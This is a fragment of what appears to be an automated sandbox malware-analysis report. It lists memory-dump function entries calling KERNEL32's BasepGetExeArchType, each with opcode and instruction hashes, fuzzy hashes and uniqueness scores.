                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 73f6194432818734712d60079fd059abce6c3d2ca6d9eebbe1028a88639ad705
                                                                    • Instruction ID: 201ec96caad081384175343c6ec0751472130683ee59e7cdda058599bf215b6f
                                                                    • Opcode Fuzzy Hash: 73f6194432818734712d60079fd059abce6c3d2ca6d9eebbe1028a88639ad705
                                                                    • Instruction Fuzzy Hash: 69E0C939B001298F8F44E7BDD8559EC73E1FBC8229B508065D909E7254EE24AC559B51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C17D5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 2d6b9816e868828c39eb910f377d58e17da16e269fa83c952aeb4012463b1252
                                                                    • Instruction ID: 2b826978a899c1db8acc68c10273e45131db83ae279e1a7b310236b83449a741
                                                                    • Opcode Fuzzy Hash: 2d6b9816e868828c39eb910f377d58e17da16e269fa83c952aeb4012463b1252
                                                                    • Instruction Fuzzy Hash: BBE03939B001288F8F44F7ACD8549EC73F1EBC922AB008061D909E3350EE249C419761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C15B0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 17004ff554a60f4b069bdcb08e18f331fe6b8c68f995d3b07153ec999637c35c
                                                                    • Instruction ID: 39d5e4333dbab3bd668513b3f8a1bf078b3a956e23c43ba6993998233f1f3db2
                                                                    • Opcode Fuzzy Hash: 17004ff554a60f4b069bdcb08e18f331fe6b8c68f995d3b07153ec999637c35c
                                                                    • Instruction Fuzzy Hash: D0E06D39B001288F8F44E7BCD8545ECB3F1EFC8229B008061D90AE7350EF349C419750
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 01058C36
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936767861.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 98389bdb14b198c58d0e4218e238939aaf5dfc8f164cd21acab4735b20a0d17a
                                                                    • Instruction ID: 26dbbf0aa4bf6a5b7077d098c97c750daa68de0959d038b0a3d0497aea54b8ef
                                                                    • Opcode Fuzzy Hash: 98389bdb14b198c58d0e4218e238939aaf5dfc8f164cd21acab4735b20a0d17a
                                                                    • Instruction Fuzzy Hash: E6E03939F001288F8F44EBBCD8449EC73F1FBC8229B008065D90AE3290EE349C418B50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions